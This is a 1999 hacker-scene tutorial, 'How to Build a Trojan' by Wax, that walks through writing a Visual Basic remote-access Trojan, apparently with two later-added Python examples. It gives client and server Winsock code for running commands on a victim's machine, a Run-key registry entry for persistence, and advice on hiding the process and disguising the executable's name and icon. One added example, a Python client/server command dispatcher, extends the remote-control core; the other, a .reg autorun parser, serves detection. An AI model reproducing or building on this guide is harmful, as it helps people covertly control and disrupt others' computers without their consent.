HOW TO BUILD A TROJAN by Wax
Chapter I : Getting Started
Chapter II : The Client
Chapter III : The Server
Chapter IV : Colophon + Resources
===================================================
CHAPTER I - GETTING STARTED
First of all, you need a reasonably good working knowledge of
the language you are going to write the Trojan in. I wrote my
first Trojan in VB, so this article mostly describes how to do
it in VB, but since it only gives short snippets rather than a
complete source listing, the same approach can be used in Delphi
as well (with some minor modifications).
I also advise reading a book or some good quality articles on
using the Windows API (Dan Appleman's Win32 API book, for example).
Every Trojan consists of 2 parts:
The Server: This is the program that the victim runs. It waits
for a connection from the client and executes the commands the
client sends it over that connection.
The Client: This is the program that the 'administrator' has.
It sends command strings to the server so that the server knows
what to execute. For example: should you press a button that is
meant to open the CD-ROM drive, the client would use the
connection between client and server to send a string, e.g.
OPENCDROM; the server would recognize that string and run the
code you have attached to it (in this case: the API call that
opens the CD-ROM drive).
OK, the best thing to do is start with the CLIENT. First of all
you have to make a plan of which functions you want the Trojan
to have and how you plan to implement them. For example, in
Visual Basic there is an ActiveX (OCX) control that can play
sound or video files, but you can also use the Windows API to
play a sound. The advantage of the API is that you do not need
to ship that OCX separately and it takes less code. Using the
API it would look something like this:
--
Private Declare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As String) As Long
Dim x As Long
x = mciExecute("play c:\sound.wav")   ' nonzero return means the MCI command succeeded
--
You do, of course, have to declare the function and the DLL it
lives in (winmm.dll) with a Declare statement in VB, as above
(read a book on the API for details).
OK, in this article I will start with the CLIENT as well; should
you want to start with the SERVER first, head on to chapter III
(The Server).
===================================================
CHAPTER II - THE CLIENT
===================================================
Assuming you know your language well enough to implement data
structures and such, I will describe WHY and HOW to use them.
You start off with a blank form. Depending on how many functions
you want, you can create a number of buttons or a menu (or
whatever you think suits best).
Here's a sample GUI showing how it could look; I've used menus
(in the drawing they are unfolded):
_________________________________________________________
|PROGRAM NAME______________________________________- [] x |
|FILE_________ COMMANDS_____ HELP______________________|
|Setup | |Shutdown | |About | |
|Connect | |Reboot | |Help | |
|Disconnect  | |Open Cd-Rom | |------| |
|Exit | |Close Cd-Rom | |
|------------| |-------------| |
| |
| |
| |
| |
| |
|_________________________________________________________|
Throughout this chapter I will refer to menu functions; you can
recognize them because I write them in full capitals between
single quotes ( '..' ).
At 'FILE' -> 'SETUP' you can make a setup dialog in which the
user defines the IP of the computer to connect to, as well as
the PORT on which the server is listening for commands.
At 'FILE' -> 'CONNECT' the command to connect to the server is
issued. Make sure to keep the user informed of the connection
attempt as well as the connected state, e.g. by placing a label
which updates every 3 seconds with the current Winsock state, so
that they know whether they are connected or not.
At 'FILE' -> 'DISCONNECT' the command to disconnect from the
server is issued; here too, make sure it is clearly noticeable
that you are disconnected from the server.
And of course at 'FILE' -> 'EXIT' you can exit the program.
At 'COMMANDS' -> '...' you add the commands to be executed, but
more on that in the technical part of the client.
At 'HELP' -> 'ABOUT' you can put your own credits, and of course
some credits for me, since you have used this guide to create
your Trojan :)
OK, now you know the basics of the GUI. Of course you can always
use graphics or any other type of GUI, but make sure there is a
GUI, or an optional GUI, since most users nowadays are Windows
users. (There's a more complicated GUI drawing at the end of the file.)
Now for the 'Technical' part of the client:
Sending the commands to the server.
--
This is done using the Winsock control's SendData method.
Say you want to send the string CD-ROMOPEN to the server; in VB
you would write:
Winsock1.SendData "CD-ROMOPEN"
To make sure there is a connection you can use an IF..THEN
statement that checks the Winsock control's State, like this:
--
If Winsock1.State = sckConnected Then
    Winsock1.SendData "CD-ROMOPEN"
Else
    MsgBox "You're not connected!", vbCritical
End If
--
OK, this is the client. It is not that hard, and by using the
above scheme to send strings you can let the Trojan's server
recognize them and run the attached code on the victim's
computer.
===================================================
CHAPTER III - THE SERVER
===================================================
Now for the server. The server is the hardest part of the Trojan,
since there are a lot of requirements it has to meet. I will try
to make a complete list of what it should or should not do:
* Not be visible on the user's screen
* Not be visible in the task list (the CTRL-ALT-DEL list)
* Have a name that is not easily recognized
* Start automatically at startup (through the registry, e.g.)
* Not use many system resources (RAM, CPU)
Below is a registry file which adds a value under the Run key so
that the server is started every time Windows starts. The value
gives no path, so the exe has to be in the Windows or System
directory, where Windows finds it through its normal executable
search order:
--
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trojan"="Trojan.exe"
--
Of course in your own file you might want to change the value
name from "Trojan" to e.g. Taskman or Word or something the user
will not be suspicious about. The executable in the Windows or
System directory needs an inconspicuous name too; you could call
it _.exe or something, with a 100% transparent icon, so users
look right past it.
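For checking a .reg file like the one above before (or after) it is merged, here is a small parser for the REGEDIT4 format in Python, added as an example for this edit and not part of the original article. It reads the article's Run-key fragment together with a couple of constructed entries, lists everything under the Run/RunOnce keys, and flags values that name a bare executable with no directory; those are resolved through Windows' normal executable search order at logon, which is exactly why the article puts the exe in the Windows or System directory, and they are what a reviewer should look at first.

```python
"""Added example, not part of the original article: a parser for the
REGEDIT4 text format, applied to the article's Run-key fragment plus
constructed entries, listing autorun values and flagging bare exe names."""
import re

AUTORUN_KEYS = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
}
AUTORUN_KEYS_UC = {k.upper() for k in AUTORUN_KEYS}

# "name"="value" (or @="value" for the default value); \" and \\ are escapes
_STRING_VALUE = re.compile(
    r'^(?:"((?:[^"\\]|\\.)*)"|@)\s*=\s*"((?:[^"\\]|\\.)*)"\s*$')


def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return {key path: {value name: string value}}.  Non-string value
    types (dword:, hex:) are ignored; '@' denotes a key's default value."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";")
                or line.upper().startswith("REGEDIT")
                or line.startswith("Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _STRING_VALUE.match(line)
        if m and current is not None:
            name = _unescape(m.group(1)) if m.group(1) is not None else "@"
            keys[current][name] = _unescape(m.group(2))
    return keys


def _program(value):
    """First token of a command line: a quoted path, or up to the first space."""
    v = value.strip()
    if v.startswith('"'):
        end = v.find('"', 1)
        return v[1:end] if end > 0 else v[1:]
    return v.split(None, 1)[0] if v else ""


def autorun_entries(parsed):
    """(key, name, program, is_bare) for every value under an autorun key;
    key paths compare case-insensitively, as the registry does."""
    out = []
    for key, values in parsed.items():
        if key.upper() not in AUTORUN_KEYS_UC:
            continue
        for name, value in values.items():
            prog = _program(value)
            bare = "\\" not in prog and "/" not in prog   # no directory given
            out.append((key, name, prog, bare))
    return out


# The article's fragment plus constructed entries for comparison.
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trojan"="Trojan.exe"
"Taskman"="_.exe"
; constructed: a legitimate-looking entry with a full quoted path
"SomeTool"="\"C:\\Program Files\\Some Tool\\tool.exe\" /background"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Helper"="C:\\WINDOWS\\helper.exe"
'''


def report(text=SAMPLE_REG):
    """Return (name, program) for the bare-name entries, the ones to check first."""
    return [(name, prog)
            for _, name, prog, bare in autorun_entries(parse_reg(text)) if bare]
```

On the sample, report() returns the two article entries ("Trojan"/"Trojan.exe" and "Taskman"/"_.exe") and not the constructed ones, which carry a full path. The same parser can be pointed at an exported .reg file from a machine under investigation.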
Now there is not much of a GUI for the server, so I'll skip that
part.
Technical:
A Winsock control on the server needs to have a certain port
specified, and it must be listening on it and accepting all
incoming connections on that port. In VB that would be:
--
Winsock1.LocalPort = 333
Winsock1.Listen
' and in Winsock1_ConnectionRequest(ByVal requestID As Long), to accept the client:
Winsock1.Close: Winsock1.Accept requestID
--
Now comes the core engine of the Trojan: receiving and handling
the incoming data from the client.
In the Winsock control's DataArrival event you use the statement
Winsock1.GetData data, but of course you must first Dim data as
a String. Then you use a Select Case on the data to match it
against the known commands; if it matches, the attached command
is executed. Below is a snippet of code that handles this:
--
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
    Dim data As String
    Winsock1.GetData data, vbString
    Select Case UCase$(Trim$(data))   ' match regardless of case/spaces
        Case "ABOUT"
            Call About1
    End Select
End Sub
--
As you can see it Dims the data as a String, since the client
sends its commands as strings; it then gets the data and matches
it against the Case labels. In this case, if you sent the string
ABOUT it will call the private sub About1, shown below. Note that
Winsock is a TCP stream, not a message service: two commands sent
quickly after each other can arrive in a single DataArrival event,
and a long command can arrive in pieces, so a real implementation
should end each command with a delimiter (e.g. vbCrLf), buffer
what arrives, and only match complete lines.
--
Private Sub About1()
    MsgBox "U ARE INFECTED BY [YOURNAME'S] TROJAN!", vbCritical
End Sub
--
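To see both halves working together, here is the same client/server exchange rewritten in Python (an added example for this edit, not code from the original article or from Wax's own Trojan). It runs both sides on localhost in one process. The command names are the article's; the handlers only record what they would have done. It also shows the one thing the VB snippets leave out: TCP is a stream, so each command is terminated with a newline and the server buffers until a whole line has arrived, which is why two commands sent in a single write are still handled separately.

```python
"""Added example, not from the original article: the Chapter II client and
Chapter III server over a real TCP socket on localhost, with line framing.
Handlers are stand-ins that only record what they would have done."""
import socket
import threading

DELIM = b"\n"   # one command per line; TCP itself has no message boundaries


def make_handlers(log):
    """Dispatch table standing in for the article's Select Case block."""
    return {
        "ABOUT": lambda: log.append("about dialog shown"),
        "OPENCDROM": lambda: log.append("cd-rom opened"),
        "CLOSECDROM": lambda: log.append("cd-rom closed"),
    }


def serve_connection(conn, handlers, log):
    """Equivalent of Winsock1_DataArrival, with framing: accumulate bytes,
    dispatch every complete line, keep any partial line for the next read."""
    buf = b""
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:                 # peer closed the connection
                return
            buf += chunk
            while DELIM in buf:
                line, buf = buf.split(DELIM, 1)
                cmd = line.decode("ascii", "replace").strip().upper()
                if cmd == "QUIT":
                    conn.sendall(b"BYE\n")
                    return
                handler = handlers.get(cmd)
                if handler is None:
                    log.append("unknown command: %r" % cmd)
                    conn.sendall(b"ERR unknown\n")
                else:
                    handler()
                    conn.sendall(b"OK " + cmd.encode("ascii", "replace") + b"\n")


def start_server():
    """Listen on an OS-chosen localhost port (the VB Listen/Accept pair) and
    serve one client in a background thread.  Returns (port, log, thread)."""
    log = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        with srv:
            conn, _ = srv.accept()
            serve_connection(conn, make_handlers(log), log)

    thread = threading.Thread(target=run, daemon=True)
    thread.start()
    return srv.getsockname()[1], log, thread


class Client:
    """The Chapter II client: CONNECT, send command strings, DISCONNECT."""
    def __init__(self):
        self.sock = self.reader = None

    def connect(self, host, port):
        self.sock = socket.create_connection((host, port), timeout=5)
        self.reader = self.sock.makefile("rb")

    def send_raw(self, data, n_replies):
        """Write bytes as-is and collect n_replies reply lines."""
        if self.sock is None:             # the sckConnected check
            raise ConnectionError("You're not connected!")
        self.sock.sendall(data)
        return [self.reader.readline().decode("ascii").strip()
                for _ in range(n_replies)]

    def send_command(self, cmd):
        return self.send_raw(cmd.encode("ascii") + DELIM, 1)[0]

    def disconnect(self):
        if self.sock is not None:
            self.send_command("QUIT")
            self.reader.close()
            self.sock.close()
            self.sock = self.reader = None


def demo():
    """Run one full session; returns (replies seen by client, server log)."""
    port, log, thread = start_server()
    c = Client()
    c.connect("127.0.0.1", port)
    replies = [c.send_command(x) for x in ("ABOUT", "OPENCDROM", "FORMAT C:")]
    # Two commands in one write: the article's Select Case would receive
    # "CLOSECDROM\nABOUT\n" as a single unmatched string; framing splits it.
    replies += c.send_raw(b"CLOSECDROM\nABOUT\n", 2)
    c.disconnect()
    thread.join(5)
    return replies, log
```

Calling demo() runs the whole session: three commands one at a time (the third, FORMAT C:, is unknown and answered with ERR), then two commands in a single write, then QUIT. The server's dispatch table is the place where the article's Select Case grows; with the dict, adding a command is one line and unknown strings are rejected explicitly instead of silently falling through.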
The best thing would be to make a module in the project, go online
and collect all the useful API code you can find. I've listed a few
things you might want to implement:
- CDROM OPEN/CLOSE
- SHUTDOWN WINDOWS
- DISABLE KEYBOARD/MOUSE
After you've read this article I'm sure you will be able to write
your own Trojan, since the core is described here and the source
code provided is the key to making Trojans. I wish you happy
programming, and, as the people on #coders always answer:
IT'S JUST A SMOP (Simple Matter Of Programming)
===================================================
CHAPTER IV - COLOPHON + RESOURCES
===================================================
Writing of this guide is Copyright 1999 by Wax
Eyewitness Archives 1999
Waxattacks own Trojan, written together with
Kilobyte from Synetic Industries, can be found
at: http://www.acornweb.com/synetic/
All code & writing in this guide are Copyright Wax
ASCII Drawings however are Copyright 1999 by
aTm from CLASS, freely taken from JTF 98 issues
Resources:
--
http://www.respect-inc.com/eyewitness EYEWITNESS ARCHIVES
http://www.vb-world.net API CODES
http://www.planet-source-code.com API CODES